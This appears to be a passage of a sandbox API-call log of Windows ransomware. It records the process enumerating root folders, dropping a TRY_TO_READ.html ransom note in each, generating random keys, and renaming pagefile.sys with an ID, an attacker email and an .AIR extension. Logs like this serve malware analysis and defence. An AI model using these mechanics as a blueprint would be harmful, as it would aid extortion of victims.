	[0051.798] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596ee0 | out: hHeap=0x540000) returned 1
	[0051.798] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f08 | out: hHeap=0x540000) returned 1
	[0051.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f08
	[0051.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596ee0
	[0051.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f30
	[0051.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.798] GetLastError () returned 0x0
	[0051.798] SetLastError (dwErrCode=0x0) 
	[0051.798] GetLastError () returned 0x0
	[0051.798] SetLastError (dwErrCode=0x0) 
	[0051.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.798] CreateFileW (lpFileName="C:\\\\PerfLogs\\TRY_TO_READ.html" (normalized: "c:\\perflogs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.798] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.799] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.799] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.799] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.800] CloseHandle (hObject=0x3bc) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f30 | out: hHeap=0x540000) returned 1
	[0051.800] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb940ec40, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb940ec40, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.800] GetLastError () returned 0x0
	[0051.800] SetLastError (dwErrCode=0x0) 
	[0051.800] GetLastError () returned 0x0
	[0051.800] SetLastError (dwErrCode=0x0) 
	[0051.800] GetLastError () returned 0x0
	[0051.800] SetLastError (dwErrCode=0x0) 
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f30
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f58
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f30 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f58 | out: hHeap=0x540000) returned 1
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839f8
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f58
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f30
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574da0
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574da0 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f80 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f30 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f58 | out: hHeap=0x540000) returned 1
	[0051.800] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839f8 | out: hHeap=0x540000) returned 1
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839f8
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f58
	[0051.801] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.801] GetLastError () returned 0x0
	[0051.801] SetLastError (dwErrCode=0x0) 
	[0051.801] GetLastError () returned 0x0
	[0051.801] SetLastError (dwErrCode=0x0) 
	[0051.801] GetLastError () returned 0x0
	[0051.801] SetLastError (dwErrCode=0x0) 
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a68
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a68 | out: hHeap=0x540000) returned 1
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a68
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a68 | out: hHeap=0x540000) returned 1
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a68
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f30
	[0051.801] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.801] GetLastError () returned 0x0
	[0051.801] SetLastError (dwErrCode=0x0) 
	[0051.801] GetLastError () returned 0x0
	[0051.801] SetLastError (dwErrCode=0x0) 
	[0051.801] GetLastError () returned 0x0
	[0051.801] SetLastError (dwErrCode=0x0) 
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.801] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596fa8
	[0051.801] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f80 | out: hHeap=0x540000) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596fa8 | out: hHeap=0x540000) returned 1
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596fa8
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x56d040
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574da0
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574da0 | out: hHeap=0x540000) returned 1
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5198
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5198 | out: hHeap=0x540000) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56d040 | out: hHeap=0x540000) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f80 | out: hHeap=0x540000) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596fa8 | out: hHeap=0x540000) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.802] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.802] GetLastError () returned 0x0
	[0051.802] SetLastError (dwErrCode=0x0) 
	[0051.802] GetLastError () returned 0x0
	[0051.802] SetLastError (dwErrCode=0x0) 
	[0051.802] GetLastError () returned 0x0
	[0051.802] SetLastError (dwErrCode=0x0) 
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596fa8
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596fa8 | out: hHeap=0x540000) returned 1
	[0051.802] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f80 | out: hHeap=0x540000) returned 1
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596fa8
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x56d040
	[0051.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.803] GetLastError () returned 0x0
	[0051.803] SetLastError (dwErrCode=0x0) 
	[0051.803] GetLastError () returned 0x0
	[0051.803] SetLastError (dwErrCode=0x0) 
	[0051.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.803] CreateFileW (lpFileName="C:\\\\Recovery\\TRY_TO_READ.html" (normalized: "c:\\recovery\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.804] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.804] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.805] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.805] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.805] CloseHandle (hObject=0x3bc) returned 1
	[0051.805] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.805] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.805] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.805] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56d040 | out: hHeap=0x540000) returned 1
	[0051.805] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xc28f1830, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc28f1830, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1
	[0051.805] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.805] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.805] GetLastError () returned 0x0
	[0051.805] SetLastError (dwErrCode=0x0) 
	[0051.805] GetLastError () returned 0x0
	[0051.805] SetLastError (dwErrCode=0x0) 
	[0051.806] GetLastError () returned 0x0
	[0051.806] SetLastError (dwErrCode=0x0) 
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.806] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.806] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x56d040
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.806] GetLastError () returned 0x0
	[0051.806] SetLastError (dwErrCode=0x0) 
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.806] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.806] GetLastError () returned 0x0
	[0051.806] SetLastError (dwErrCode=0x0) 
	[0051.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0051.806] CreateFileW (lpFileName="C:\\\\System Volume Information\\TRY_TO_READ.html" (normalized: "c:\\system volume information\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0051.807] CloseHandle (hObject=0xffffffff) returned 0
	[0051.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.807] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1
	[0051.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.807] GetLastError () returned 0x6
	[0051.807] SetLastError (dwErrCode=0x6) 
	[0051.807] GetLastError () returned 0x6
	[0051.807] SetLastError (dwErrCode=0x6) 
	[0051.807] GetLastError () returned 0x6
	[0051.807] SetLastError (dwErrCode=0x6) 
	[0051.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5198
	[0051.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a51c0
	[0051.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a51e8
	[0051.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.808] GetLastError () returned 0x6
	[0051.808] SetLastError (dwErrCode=0x6) 
	[0051.808] GetLastError () returned 0x6
	[0051.808] SetLastError (dwErrCode=0x6) 
	[0051.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.808] CreateFileW (lpFileName="C:\\\\Users\\TRY_TO_READ.html" (normalized: "c:\\users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.811] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.811] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.812] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.812] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.812] CloseHandle (hObject=0x3bc) returned 1
	[0051.812] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a51e8 | out: hHeap=0x540000) returned 1
	[0051.813] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc192c670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc192c670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.813] GetLastError () returned 0xb7
	[0051.813] SetLastError (dwErrCode=0xb7) 
	[0051.813] GetLastError () returned 0xb7
	[0051.813] SetLastError (dwErrCode=0xb7) 
	[0051.813] GetLastError () returned 0xb7
	[0051.813] SetLastError (dwErrCode=0xb7) 
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a51e8
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574da0
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574da0 | out: hHeap=0x540000) returned 1
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a51e8 | out: hHeap=0x540000) returned 1
	[0051.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.813] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc192c670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc192c670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a5980
	[0051.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.813] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a5980 | out: pbBuffer=0x5a5980) returned 1
	[0051.814] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596520 | out: pbBuffer=0x596520) returned 1
	[0051.814] SetFileAttributesW (lpFileName="C:\\\\pagefile.sys", dwFileAttributes=0x80) returned 0
	[0051.814] lstrlenW (lpString="C:\\\\pagefile.sys") returned 16
	[0051.814] GetProcessHeap () returned 0x540000
	[0051.814] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x86) returned 0x5832a8
	[0051.814] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\pagefile.sys" | out: lpString1="C:\\\\pagefile.sys") returned="C:\\\\pagefile.sys"
	[0051.814] lstrcatW (in: lpString1="C:\\\\pagefile.sys", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.814] MoveFileExW (lpExistingFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), lpNewFileName="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
